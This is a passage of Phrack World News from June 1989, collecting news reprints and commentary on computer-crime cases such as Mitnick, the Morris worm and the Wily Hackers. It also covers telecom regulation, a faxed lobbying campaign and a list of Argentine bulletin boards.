Kenneth Siani Speaks Out About Kevin Mitnick                       May 23, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Kevin Mitnick, the hacker "so dangerous that he can't even be allowed to use a
phone."  "He could ruin your life with his keyboard."  "Armed with a keyboard
and considered dangerous."

These are some of the things that have been said about this person.  All of
this media hype would be fine if it just sold newspapers.  But it has done much
more then just sell a few papers. It has influenced those that will ultimately
decide his fate.  I myself do not know the man, but I have talked to others
that do.  Including one of the persons that investigated Mitnick.  From all I
have heard about him, I think he is a slime ball!  But even a slime ball should
not be railroaded into a prison sentence that others of equal or greater guilt
have avoided.

I personally feel the man is just a criminal, like the guy that robs a 7/11, no
better but certainly not any worse.  Unfortunately he is thought of as some
kind of a "SUPER HACKER."  The head of Los Angeles Police Dept's Computer Crime
Unit is quoted as saying, "Mitnick is several levels above what you would
characterize as a computer hacker."

No disrespect intended, but a statement like this from the head of a computer
crime unit indicates his ignorance on the ability of hackers and phone phreaks.
Sure he did things like access and perhaps even altered Police Department
criminal records, credit records at TRW Corp, and Pacific Telephone,
disconnecting phones of people he didn't like etc.  But what is not understood
by most people outside of the hack/phreak world is that these things are VERY
EASY TO DO AND ARE DONE ALL THE TIME.  In the hack/phreak community such
manipulation of computer and phone systems is all to easy.  I see nothing
special about his ability to do this.  The only thing special about Kevin
Mitnick is that he is not a "novice" hacker like most of the thirteen year old
kids that get busted for hacking/phreaking.  It has been a number of years
since an "advanced" hacker has been arrested.  Not since the days of the Inner
Circle gang have law enforcement authorities had to deal with a hacker working
at this level of ability.  As a general rule, advanced hackers do not get
caught because of there activity but rather it is almost always others that
turn them in.  It is therefore easy to understand why his abilities are
perceived as being extraordinary when in fact they are not.

Because of all the media hype this case has received I'm afraid that:

1.) He will not be treated fairly. He will be judged as a much greater threat
    to society then others that have committed similar crimes.

2.) He will become some kind of folk hero.  A Jesse James with a keyboard.
    This will only cause other to follow in his footsteps.

I'm not defending him or the things he has done in any sense.  All I'm saying
is let's be fair.  Judge the man by the facts, not the headlines.

Disclaimer:  The views expressed here are my own.

  Kenneth Siani, Sr. Security Specialist, Information Systems Div., NYMA Inc.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
If you are looking for other articles about Kevin David Mitnick aka Condor
please refer to;

"Pacific Bell Means Business"                   (10/06/88) PWN XXI. . .Part 1
"Dangerous Hacker Is Captured"                  (No Date ) PWN XXII . .Part 1
"Ex-Computer Whiz Kid Held On New Fraud Counts" (12/16/88) PWN XXII . .Part 1
"Dangerous Keyboard Artist"                     (12/20/88) PWN XXII . .Part 1
"Armed With A Keyboard And Considered Dangerous"(12/28/88) PWN XXIII. .Part 1
"Dark Side Hacker Seen As Electronic Terrorist" (01/08/89) PWN XXIII. .Part 1
"Mitnick Plea Bargains"                         (03/16/89) PWN XXV. . .Part 1
_______________________________________________________________________________

Computer Intrusion Network in Detroit                              May 25, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Taken from the San Jose Mercury News (Knight-Ridder News Service)

DETROIT -- Secret Service agents smashed what they described as a costly,
sophisticated computer intrusion network on Wednesday, May 24, and were
surprised to discover it made up largely of teen-agers.

The computer systems of more than 20 companies including the Michigan
Department of Treasury, Home Box Office cable television services, [and RCA]
were infiltrated, according to agents serving search warrants across the
country.

Federal officials said the infiltrations by the network represented fraud of
$200,000 to $1.5 million in appropriated goods, telephone and computer time.

Agents expected to arrest some adults when they swept down on eight people who
allegedly ran the network in several states.  Instead, they found only one
adult, in Chicago.  The rest were teen-agers as young as 14:  Two in Columbus,
Ohio; two in Boston, Massachusetts; two in Sterling Heights, Michigan [The
Outsider and The Untouchable]; and one in Atlanta, Georgia.  Agents expected to
make another arrest in Los Angeles.

Officials said at least 55 other people nationwide made use of the network's
information.

In Sterling Heights, Secret Service agents pulled two eighth-grader boys, both
14, out of school and questioned them in the presence of their parents, who
apparently were unaware of their activities.  James Huse, special agent in
charge of the U.S. Secret Service office in Detroit, said the youths admitted
involvement in the scheme.

He said the eight-graders, because they are juveniles, cannot be charged under
federal law and will be dealt with by local juvenile authorities.

Authorities believe the mastermind is Lynn Doucett, 35, of Chicago.  She was
arrested Wednesday, May 24, and is cooperating with authorities, Huse said.

Doucett, who was convicted in Canada of telecommunications fraud, supports
herself and two children through her computer intrusion activities, which
include using stolen or counterfeit credit cards for cash advances or money
orders, according to an affidavit filed in U.S. District Court.

If convicted, she faces up to 10 years in prison and a $250,000 fine.

               Special Thanks to Jedi For Additional Information
_______________________________________________________________________________

HR 1504 -- Beeper Abuse Prevention Act                             May 22, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                 "Pagers Don't Commit Crimes, Congressmen Do."

The fools in congress assembled are at it again.  Three years in jail for
selling a pager to a minor?  If you didn't believe when Abbie Hoffman said that
the drug hysteria was just an excuse for more control of the citizens, think
again.

In USA Today was a "face-off" on the issues.  According to this article,
Representative Kweisi Mfume (D-Md) says the following:

     "The drug business is using the  latest technology to promote its
     deadly trade.  One such advance, the paging device, or beeper, is
     now appearing in classrooms and schoolyards.  I have introduced the
     Beeper Abuse Prevention Act to curtail the use of beepers by young
     people who deal drugs.  It would require the Federal Communications
     Commission to prescribe regulations that would restrict the
     possession and use of paging devices by persons under age 21.

     Law officers say dealers and suppliers send coded messages via
     beeper to youths in school.  The codes translate into messages like
     "meet me at our regular place after class to pick up the drugs."
     Drug traffickers are even using 800 numbers now available with
     regional paging services.  A supplier could actually conduct a
     transaction in Baltimore from Miami, for example.

     My bill, H.R. 1504, would require any person selling or renting
     paging devices to verify the identification and age of every
     customer; encourage parents and businesses to take more
     responsibility in their children's or employees' activities; make
     it unlawful for a person to knowingly and willfully rent, sell or
     use paging devices in violation of rules prescrived by the FCC
     (there are provisions for stiff fines and up to three-year prison
     terms for adults who illegally provide beepers to youths); and
     require parents or businesses who allow the use of beepers to state
     that intention with and affidavit at the time of purchase."

He goes on to say that he recognizes that there are legitimate uses of beepers,
but we can no longer stand by and watch drugs flow into our neighborhoods.  The
opposite side is taken by Lynn Scarlett, from Santa Monica, CA.  She asks what
beepers have to do with the drug trade, and regulating their use will not put a
dent it it.  She also says that there is little evidence that gun control keeps
guns out of the hands of gangsters, and it will take a good dose of wizardry to
keep beepers away from bad guys.  She finishes with:

     "The logic of the Beeper Abuse Prevention Act opens the door for
     laws to make us sign promises that we won't, we swear, use these
     things for illicit acts when we buy them.  De Tocqueville, that
     eminent observer of our nation, warned that our loss of freedom
     would sneak in through passage of quiet, seemingly innocuous and
     well-intended laws -- laws like H.R. 1504.
_______________________________________________________________________________

Computer Threat Research Association (UK)                        March 31, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For those of you interested an umbrella organization has been established in
the United Kingdom to coordinate information on, and research into, all aspects
of computer security.  In the first instance one of the organization's primary
concerns will be combatting the threat posed by computer viruses by acting as a
clearing house for virus information and control software.

Below is a copy of an initial letter mailed to prospective members:

                   The Computer Threat Research Association

The computer threat research association, CoTra is a non-profit making
organization that exists to research, analyze, publicize and find solutions
for threats to the integrity and reliability of computer systems.

The issue that caused the formation of CoTra was the rise of the computer
virus.  This problem has since become surrounded by fear, uncertainty and
doubt.  To the average user, the computer virus and its implications are a
worry of an unknown scale.  To a few unfortunates whose systems have become
victims, it is a critical issue.

The key advantage of CoTra membership will be access to advice and information.
Advice will be provided through publications, an electronic conference (a
closed conference for CoTra's members has been created on the Compulink CIX
system) as well as other channels such as general postings direct to members
when a new virus is discovered.

CoTra membership will be available on a student, full or corporate member
basis.  All software that is held by CoTra that enhances system reliability,
such as virus detection and removal software, will be available to all members.
It is intended to establish discounts with suppliers of reliability tools and
services.  A library of virus sources and executables and other dangerous
research material will be made available to members who have a demonstrable
need.

A register of consultants who have specific skills in the systems reliability
field will be published by CoTra and reviews of reliability enhancing software
will be produced.

Your support of CoTra will ensure that you have the earliest and most accurate
information about potential threats to your computer systems.

CoTra, The Computer Threat Research Association,
c/o 144 Sheerstock, Haddenham, Bucks.  HP17 8EX
_______________________________________________________________________________

Strange Customs Service Clock Department                            May 1, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Written by Vanessa Jo Grimm (Goverment Computer News)(Page 6)

The U.S. attorney for Washington is reviewing an allegation that a Customs
Service official violated the Computer Security Act [PL 100-235 presumably] by
altering a computer's internal clock.

Treasury Department Inspector General Michael R. Hill referred the allegation
to the prosecutor after an investigation into year-end spending by Custom
officials at the close of Fiscal Year 1988.  The allegation involves an
official who may have authorized altering the date maintained by the computers
that the agency uses for procurement documents, according to Maurice S. Moody,
the Inspector General's audit director for Financial Management Service.

Moody recently told the House Ways and Means Subcommittee on Oversight the
computers are part of the agency's Automated Commercial System.  He declined to
provide Government Computer News with more details.

Allegedly the computer clock was rolled back during the first three days of
October of 1988 so that $41.8 million in procurement obligations would be dated
in September against fiscal year 1988 appropriations, Moody said.

An inspector general report issued in late February concluded Customs had not
violated any procurement laws.  The inspector general's investigation is
continuing, however.

"Doesn't $41.8 million worth of procurement on the last day of the fiscal year
bother anybody?" asked Rep. Richard T. Shulze (R-Pa).  The purchases did bother
the inspector general, Moody said, and this concern led to getting the United
State attorney attorney.  "This problem is endemic in the federal government,"
he said.  "Year-end spending is very common."

William F. Riley, Customs controller, said he knew about the rollback, but he
and Deputy Commissioner Michael H. Lane refused to say who authorized the
action...  Subcommittee members continued to press Riley and Lane.  "Is the
person still at Customs?" asked subcommittee chairman J. J. Pickle (D-Texas).
He is working full time and in the position he was at the time," Lane answered.

Rep. Beryl F. Anthony, Jr. (D-Ark) asked how Riley became aware of the
rollback.  "He (the official who authorized the rollback) told me that it was
going to be done," Riley said.

Rep. Pickle suggested that a high ranking official would have to authorize such
an action, but Counsel advised Lane not to reply.  He did say neither he nor
Commissioner von Raab had made the decision.

The balance of the article deals with the actions of Linda Gibbs, who became
aware of the incident and reported it to the inspector general after being
unable to stop the action.  Gibbs also alleged that the action was intended to
use available year-end money to cover cost overrun on a contract with Northrop
Corp.  She also alleged that she had been reassigned and given no new duties.
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 27, File 11 of 12

            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
            PWN                                                 PWN
            PWN        P h r a c k   W o r l d   N e w s        PWN
            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
            PWN               Issue XXVII/Part 2                PWN
            PWN                                                 PWN
            PWN                  June 20, 1989                  PWN
            PWN                                                 PWN
            PWN          Created, Written, and Edited           PWN
            PWN               by Knight Lightning               PWN
            PWN                                                 PWN
            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN


Robert T. Morris Suspended From Cornell                            May 25, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Taken from the New York Times

Cornell University has suspended the graduate student identified by school
officials as the author of "the Internet worm."

In a May 16th letter to Robert Tappan Moris, age 23, the dean of the Cornell
University Graduate School said a university panel had found him guilty of
violating the school's Code of Academic Integrity.

He will be suspended until the beginning of the fall semester of 1990, and then
could reapply.

No criminal charges have been filed against Morris.  A federal grand jury this
year forwarded its recommendations to the Justice Department, which has not
taken any action.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Justice Department Wary in Computer Case                           May 28, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Matthew Spina (Syracuse Herald-American)

              "Is Washington Fearful Of Losing A Landmark Trial?"

Some computer experts theorize that the Justice Department, afraid of bungling
what could become a landmark computer case, still doesn't know how to treat the
Cornell student whose computer worm slithered nationwide in November, 1988.

A further concern in Washington:  A trial in the case might embarrass the
Department of Defense if its scientists are asked to detail how their computers
were among the thousands crippled by the worm.

For several months, the decision on how to charge 23-year-old Robert T. Morris,
Jr. had been before Mark Richard, a deputy assistant attorney general.  Within
the last few weeks, Richard made a decision that now is being reviewed by an
assistant attorney general, according to a computer professional who has been
talking with the Justice Department.

"I thought we would have heard something from Washington by now," said Andrew
Baxtoer, the assistant U.S. attorney who in November and December presented the
case to a grand jury in Syracuse.

The grand jury's report was sent on the the Justice Department, which refuses
to comment publicly on the matter because Morris has not been indicted.

"Within the next two weeks I assume that a decision will be made," said one
official.

"If they decide to begin an expensive trial, they have to make sure they win so
as not to damage future attempts to prosecute under that law," said Eugene H.
Spafford, an assistant professor at Purdue University whose analysis of the
worm has helped federal investigators.  "If they decide not to prosecute, and
the total thing that happens is he gets suspended (from Cornell), I will be
outraged."

So far, Cornell has taken the only disciplinary measure against Morris,
suspending him for the 1989-90 academic year.  But the graduate student left
the computer science department early in November, the day after the worm
spread out of a computer in Upson Hall.

Morris, a computer science graduate student, has been called the author of a
rogue computer program, called a worm, that was spread from a Cornell
University computer.  The program was designed to reproduce and infect any
computer linked to the Internet, a network shared by colleges, research centers
and military institutions.

However, experts say an error caused the program to replicate out of control,
sending thousands of copies into thousands of computers.

If Morris is to be charged with a felony, prosecutors would then have to show
he intended to destroy or extract information.

Proving that would be difficult since the program neither destroyed nor removed
information from any computer.

To convict Morris on most lesser charges, prosecutors would have to show he
intended to harm computers.

Prosecutors also could use a misdemeanor charge requiring them to prove only
that Morris gained access to a federal government computer. The worm did reach
computers at the Army Ballistics Research Laboratory and NASA's Langley
Research Center, among others.

Some computer experts wonder, though, if Defense Department officials will be
reluctant to testify publicly about how their computers were penetrated -- even
those computers holding non-classified information. In February, at a computer
convention in San Diego, Defense Department computer experts detailed some
security improvements made to the network since November, but then refused to
release copies of their presentation to people at the seminar.

The FBI -- which enforces the Computer Fraud and Abuse Act of 1986 -- and some
people in the computer industry are pushing for a vigorous prosecution to
display a strong case against computer hacking.  Others in the industry,
including some of Morris' friends from Harvard University and Cornell, urge
leniency because he was trying to demonstrate security flaws with computers.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Other articles about Robert Tappan Morris, Jr. and the Internet Worm are;

"Computer Network Disrupted By 'Virus'"            (11/03/88) PWN XXII/Part 2
"Virus Attack"                                     (11/06/88) PWN XXII/Part 2
"The Computer Jam:  How It Came About"             (11/08/88) PWN XXII/Part 2
"US Is Moving To Restrict {...} Virus"             (11/11/88) PWN XXII/Part 2 *
"FBI Studies Possible Charges In Virus"            (11/12/88) PWN XXII/Part 2
"Big Guns Take Aim At Virus"                       (11/21/88) PWN XXII/Part 3
"Congressman Plan Hearings On Virus"               (11/27/88) PWN XXII/Part 3
"Pentagon Severs Military {...} Virus"             (11/30/88) PWN XXII/Part 3 *
"Networks Of Computers At Risk From Invaders"      (12/03/88) PWN XXII/Part 4 *
"Computer Virus Eradication Act of 1988"           (12/05/88) PWN XXII/Part 4 *
"Breaking Into Computers {...}, Pure and Simple"   (12/04/88) PWN XXIV/Part 1 *
"Cornell Panel Concludes Morris {...} Virus"       (04/06/89) PWN XXVI/Part 1

* - Indicates that the article was not directly related to Robert Morris, but
    did discuss him as well as the Internet Worm incident.
_______________________________________________________________________________

SouthernNet's Anti-Hacker Psychological Con Game                     April 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WARNING!  Your call is being intercepted!

Error:  Setting may not be changed by callers.


                  Welcome to:  S o u t h e r n N e t   I n c.


You have reached the SouthernNet Fraud Department, the authorization code you
are attempting to use is not valid.  Hacking and illegal use of codes are
violations of state and federal laws.

We are currently conducting an investigaion for code abuse in your area and we
are coordinating the investigation with law enforcement authorities. Persons
identified hacking or abusing codes will be prosecuted to the full extent of
the law.

I'll see you soon,

Hacker Tracker
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Hold for additional information:

Hacker Tracker is unavailable right now; however, you may avoid possible arrest
and/or prosecution by calling Hacker Tracker in person.

You may contact Mr. Tracker between the hours of 9:00 AM and 5:00 PM Eastern
Standard Time, Monday - Friday, simply by dialing the access number you have
just used and code number 101010 or 011010 if the access  you have used
requires a seven digit code.  Just hold the line for 10 seconds and your call
will automatically be routed to Mr. Tracker at no charge to you.

This is *NOT* a trick and it will be the intention of SouthernNet Inc. to
settle this matter without involving law enforcement authorities if you
cooperate with our fraud department 100%.

It will certainly be to your advantage to contact Mr. Tracker as this will
reflect your own decision to assist and avoid prosecution by our company!!!

I'll be expecting your call.

Hacker Tracker

Hold a sec... Engaging Auto Page for Hacker Tracker...

      50 seconds till disconnect
      40 seconds till disconnect
      30 seconds till disconnect
      20 seconds till disconnect
      10 seconds till disconnect
       5 seconds till disconnect

NO CARRIER


 [Do you think anyone believed this and actually called "Hacker Tracker?" -KL]
_______________________________________________________________________________

What's Happening:  Computer Security Up                            June 4, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Taken from Gannett Westchester Newspapers

                   [Comments in brackets from Delta-Master]

High-tech companies are spending 64% more [than they previously spent] on
computer security, according to a recent survey conducted by the National
Center for Computer Crime Data in Los Angeles.  The group surveyed 3,500 law
enforcement agencies and computer security experts about computer crime.  The
prosecution rate is also up -- 6.4% in 1988 from only 2.4% during 1987.

Contrary to popular image, computer hackers aren't always young boys.  The
study found that 32% of those arrested for computer crimes were female, while
only 14% were under 21.  The study said 45% of hackers were 25 to 30 years old.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Comments from Delta-Master
~~~~~~~~~~~~~~~~~~~~~~~~~~
I do not know about you people, but the public's confusion about hackers starts
to bother me when they make errors.  Seriously, I know of only a few hackers
over the age of 21.  The fact that the newspapers also equate the thug-like
computer criminals with the mastermind-criminal type hacker (you guys) is also
pretty annoying, wouldn't you agree?  One key phrase you must note: "32% OF
THOSE ARRESTED."  Oh well, such are the mistakes of newspapers.
_______________________________________________________________________________

Public Service Commission Bans Operator Companies                April 24, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Jerri Stroud (St. Louis Post-Dispatch)

The Missouri Public Service Commission voted 4-1 last week to ban providers of
so-called alternative operator services in Missouri because allowing the
companies to operate is "not in the public interest."

Alternative operator services companies contract with hotels, motels colleges,
hospitals, airports, restaurants and other facilities to provide operator
assistance to customers using pay telephones or house phones.  Consumer groups
have complained about price-gouging by the companies nationwide.

Mark Wheatley, a lawyer for the Office of Public Council, praised the
commission's decision.

The Office of Public Council has received numerous complaints about excessive
rates and surcharges by alternative operator services companies, said Wheatley.
Some alternative operator services companies also have accepted other
companies' credit cards without authorization from the companies issuing the
cards, he said.

"We feel that it's an extremely important decision by the commission." said
Wheatley.  But he said he expects the companies affected by the ruling to
appeal.

Lawyers for the alternative operator services companies could not be reached
for comment.

In it's ruling, the commission said many consumers aren't aware of the rates
charged by the alternative operator services companies until they receive "a
bill for operator services at prices higher than those to which he is
accustomed."  Consumer groups say the rates often are twice or three times the
rates charged by better-known long-distance companies.

Even if an operator service company identifies itself when a consumer makes a
call, the commission said many consumers don't understand the significance of
the identification.

"If the end user is not educated as to the intricacies of using an alternative
operator services provider, he does not truly have a meaningful choice..." the
commission said.

The ruling only affects intrastate calls handled by alternative operator
services companies, but it may effectively prevent the companies from providing
interstate service as well.

The commission specifically denied tariff requests from International
Telecharge Inc. and American Operator Services Inc.  The commission also
directed three other companies -- Teleconnect Inc., Dial US, and Dial USA -- to
file new tariffs consistent with the ruling.

The ruling allows companies to operate who provide operator services in
connection with their business -- long-distance carriers and local telephone
companies, for example.  But the commission also placed limits on these
companies.

Under the ruling, operator services companies must:

     * Identify themselves to the caller as well as to the party being billed
       by the call (in the case of a collect or third-party call).

     * Quote rates to the caller or billed party on request, without charge.

     * Use calling card verification procedures acceptable to the companies
       issuing the cards.

     * Post in a prominent position the company's name, detailed complaint
       procedures and instruction on how to reach the local telephone company
       operator and other long-distance carriers.

     * Transfer emergency traffic to the local telephone company or American
       Telephone & Telegraph Co. until the alternative services provider can
       show that it can handle emergency calls adequately.
_______________________________________________________________________________

Fax Attack                                                         May 13, 1989
~~~~~~~~~~
Taken from The Ann Arbor News

       "Governor's Attempt To Ban Unsolicited Advertisements Backfires!"

HARTFORD, Conn - The great fax attack of 1989 -- an all-out lobbying campaign
against a bill banning unsolicited facsimile advertising -- may have backfired
when the governor's fax machine was jammed for hours with unwanted messages.

Starting Thursday, May 11, and continuing Friday, May 12, Governor William A.
O'Neill's fax machine has been beeping constantly, spitting out unwanted
messages from angry businesses that advertise by fax.

The businesses oppose a bill now awaiting O'Neill's signature that would
prohibit them from marketing their products by fax without first obtaining the
permission of the recipient.  Violators would face a $200 fine.

Starting Thursday morning, dozens of Connecticut businesses faxed to O'Neill's
office a form letter arguing against the fax ban.  The stream of fax messages
was so constant (40 came in before 10 AM) that the governor's office turned off
the fax machine Thursday (May 11).

O'Neill's press secretary, Jon. L. Sandberg, said the governor still hasn't
decided whether he will sign the bill.  But aides to the governor said the
persistent lobbying campaign proved how annoying unwanted messages can be.  The
inconvenience was compounded because the governor's office was unable to use
its fax machine to receive information about spring flooding around the state.
_______________________________________________________________________________

NYNEX Announces Info-Look Gateway                                April 28, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Introducing a new service for accessing information and more... all through
your personal computer!

Starting in May 1989, New York Telephone's INFO-LOOK (tm) Gateway Service can
be your link to accessing a variety of information, products and services.

The INFO-LOOK Gateway simplifies on-line computer access to a variety of
information providers.  When you call the Gateway phone number through your
modem, you'll be able to scan a menu of information services.

The types of information services you may choose from include:  Entertainment,
business, health, food, news, weather, sports, travel, government, educational
and reference information.  The services, some interactive, are provided by
independent companies.

The INFO-LOOK Gateway is easy to use -- even if you're relatively new to using
a PC.

What you'll need to use the INFO-LOOK Gateway

1.  Virtually any type of personal computer.

2.  A modem (300, 1200, or 2400 Baud), and communications software.  This
    enables your computer to communicate with other computers via the telephone
    system.

3.  A New York Telephone Calling Card.  If you need a New York Telephone
    Calling Card, (it's FREE), call your service representative whose number
    appears on page one of your New York Telephone bill.

Charges for using the INFO-LOOK Gateway

There are ** no ** Gateway enrollment fees and ** no ** monthly subscription
charges.  In most cases, you will be charged (New York people only):

o  A local call to reach the INFO-LOOK Gateway.

o  While you're browsing the Gateway directory of services, or moving between
   services, you pay $.05 a minute.

o  Once you connect to a service, the charge is determined by the Service
   Provider.  Some services have a per-minute usage charge.  Some services are
   free.  The charges for each service are listed in the Gateway menu.

You'll find most charges itemized on your monthly New York Telephone bill.
Some Service Providers may decide to bill you separately and directly for use
of their services.

Call for more information:

To get your free INFO-LOOK Gateway information booklet call (toll- free)
1-800-338-2720, Ext. 20, any day from 9 a.m. to 11 p.m.

Note:  New York Telephone does not provide or control the services offered
       through the INFO-LOOK Gateway Service.  They are provided by independent
       companies, which are responsible for the content, character, and quality
       of their services.

The predictions run $5 billion now and another $5-10 billion by 1991.

       [INFO-LOOK is already operating in Bell South and Bell Atlantic.]
_______________________________________________________________________________

Pacific Bell Plans Access To Computers                             June 9, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Taken from Santa Cruz Sentinel (Section B)

SAN FRANCISCO (AP) -- Pacific Bell said Thursday it hopes to compete with the
popularity of television by offering people easy access to computerized
libraries, bulletin boards and the use of electronic mail.

PacBell's California On-line -- which will be available to anybody with a
personal computer, telephone and calling card -- will be among the first in the
nation to use a graphic-based system that simplifies procedures so only a
rudimentary familiarity with computers is needed.

"It's going to offer our customers a supplement to their current leisure
activities... and among other things we've seen (in trials) a lot of people
who got away from the TV," said Roger P. Conrad, director of Videotex Gateway
Services.

"We feel this is a more productive way for people to spend their lives and we
think a lot of users are going to agree," he added.  Users will pay
"info-entrepreneurs" fees based on the time they use various services and will
be billed on their monthly telephone statements.  Unlike some on-line
information services, users do not have to subscribe ahead of time.

Conrad said the types of services are limited only by vendors' imaginations.
PacBell will make money by selling telecommunication line use to the companies.
_______________________________________________________________________________

Bulletin Boards Of Argentina                                       June 5, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Country Code = 54 (Argentina)
City Code  = 1    (Buenos Aires)

This list might be slightly incorrect due to the passage of time.  The last
update was on December 23, 1986.

Name                    Hours Of Operation       ======= Number=
----
Beta                    23:00 -  6:30     802-0288
C-Mania                 21:00 -  7:00     362-8843
CBM                     16:00 - 12:00      90-4988
Century 21              24 hours          632-7070
Cerebruss               24 hours           47-2717
Cerebruss Information   ?                  48-8300
                                           48-9886
Databank                ?                  44-9760
Drean Conection         ?                 953-2523
Los Pinos               13:00 - 19:00      21-0375
Magenta                 ?                 392-0124
Magenta                 ?                 392-0016
Maxes                   23:00 - 7:00      542-2695
Mendieta                22:00 - 8:00      654-6999
Pirates Cove            24:00 - 6:00      783-5023
Sanctuary               24:00 - 3:00      641-4608
Soft-work               22:30 - 9:00       88-2065
TCConection             19:00 - 12:00      22-4197
The Connection          24 Hours           82-5780
The Hacker              23:00 - 7:00      748-2005
Tiger                   ?                 784-2226
XCASA                   ?                 611-8136
BBS-IOM                 24 Hours          804-3602

Note:  The settings for all systems listed above are Even, 7, 1.

                              Contributed by Noli
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 27, File 12 of 12

            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
            PWN                                                 PWN
            PWN        P h r a c k   W o r l d   N e w s        PWN
            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
            PWN               Issue XXVII/Part 3                PWN
            PWN                                                 PWN
            PWN                  June 20, 1989                  PWN
            PWN                                                 PWN
            PWN          Created, Written, and Edited           PWN
            PWN               by Knight Lightning               PWN
            PWN                                                 PWN
            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN


One of Cliff Stoll's "Wily Hackers" Is Dead (Suicide?)             June 5, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
According to West German publications, the "Wily Hacker" Karl Koch, of
Hannover, West Germany, died Friday, June 3, probably by suicide.  His body was
found burnt (with gasoline) to death, in a forest near Celle (a West German
town near Hannover where he committed his hacks, as had been observed by German
Post).

Koch was one of the 2 hackers who confessed their role in the KGB hack to the
public prosecutors, therewith bringing the case to public attention.  As German
newspapers report, he probably suffered from a psychic disease:  He thought he
was permanently observed by alien beings named Illimunates' which tried to kill
him.  Probably, he had internalized the role of "Captain Hagbard" (his
pseudonym in the hacking scene), taken from a U.S. book, who (like him)
suffered from supervision by the Illuminates. Police officials evidently think
that Koch committed suicide (though it is believed, that there are "some
circumstances" which may also support other theories; no precise information
about such moments are reported).

According to German police experts, Karl Koch's role in the KGB case as in
daily life can properly be understood when reading this unknown book.

                   Information Provided by Klaus Brunnstein
                            (University of Hamburg)

                                        [Illuminates... KGB... whatever... -KL]
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Illuminatus!                                                      June 14, 1989
~~~~~~~~~~~~
The book in question is believed to be "Illuminatus!" by Harold Shea and Robert
Anton Wilson.  The book is a spoof on conspiracy theories, and suggests that
many and probably all human institutions are just fronts for a small group of
"enlightened ones," who are themselves a front for the Time dwarves from
Reticuli Zeta, or perhaps Atlantean Adepts, remnants of Crowley's Golden Dawn,
or even more likely the Lloigor of H.P. Lovecraft's Cthulhu Mythos.  A leading
character in this book is named Hagbard Celine.

"Illuminatus!" is a fun read if you like psychedelia and paranoia.  It also
seems to have influenced a lot of subsequent work, most notably Adams'
"Hitchhiker's Guide to the Galaxy."  It is easy to see how an unbalanced mind,
taking it literally, could be completely absorbed.  In fact "Illuminatus!"
seems as if it was written with the intent of just this sort of programming,
referring to it as "Operation Mindfuck."

This is probably not a real danger for the vast majority of sane adults, but it
may, tragically, have been the case here.  Or perhaps, no disrespect intended,
Koch may in the course of various hacks really have discovered too much about
the Illuminati.  After all, they are supposed to be the secret power behind the
KGB :-)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

For more information on Clifford Stoll and the Wily Hackers of West Germany,
please see:

"Who Is Clifford Stoll?"        (No Date) Phrack World News issue XXII/Part 1
"A Message From Clifford Stoll" (1/10/89) Phrack World News issue XXIII/Part 2

And the following articles all found in Phrack World News issue XXV/Part 2:

       "German Hackers Break Into Los Alamos and NASA"         (3/2/89)
       "Computer Espionage:  Three 'Wily Hackers' Arrested"    (3/2/89)
       "Computer Spy Ring Sold Top Secrets To Russia"          (3/3/89)
       "KGB Computer Break-Ins Alleged In West Germany"        (3/3/89)
       "News From The KGB/Wily Hackers"                        (3/7/89)
_______________________________________________________________________________

Sex Put On Probation By Mystery Hacker                            June 13, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ft. Lauderdale News and Sun-Sentinel

      "Yes, you sound very sexy, but I really need a probation officer."

DELRAY BEACH, Fla. -- Callers trying to dial a probation office in Delray
Beach, Fla on Monday, June 12, heard a smorgasbord of sex talk from a panting
woman named Tina instead.

Southern Bell telephone officials said a computer hacker reprogrammed their
equipment over the weekend, routing overflow calls intended for the local
probation office to a New York-based phone sex line.

"People are calling the Department of Corrections and getting some kind of sex
palace," said Thomas Salgluff, a spokesman for the Palm Beach County probation
office.

Southern Bell officials said it was the first time their switching equipment has
been reprogrammed by an outside computer intruder.  Southern Bell provides
local telephone service in Florida, Georgia, North Carolina, and South
Carolina.

"We're very alarmed," said Southern Bell spokesman Buck Passmore.  He said such
a feat would require someone with considerable computer knowledge.

The implications of such a computer breach are considerable.  Intercepting
corporate communications, uncovering unlisted phone numbers, and tampering with
billing information are all plausible consequences of computer security
breaches at the the phone company.

